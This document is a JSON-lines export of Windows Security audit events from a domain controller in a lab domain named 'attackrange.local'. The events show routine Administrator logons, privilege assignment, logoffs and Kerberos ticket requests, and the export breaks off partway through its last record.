{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220494,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220495,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B467\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b467","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220496,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B467\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6b467","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220497,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B467\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b467","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220498,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220499,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220500,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220501,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B488\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b488","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220502,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B488\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6b488","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220503,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6558B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6558b","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220504,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B488\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b488","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220505,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220506,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220507,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 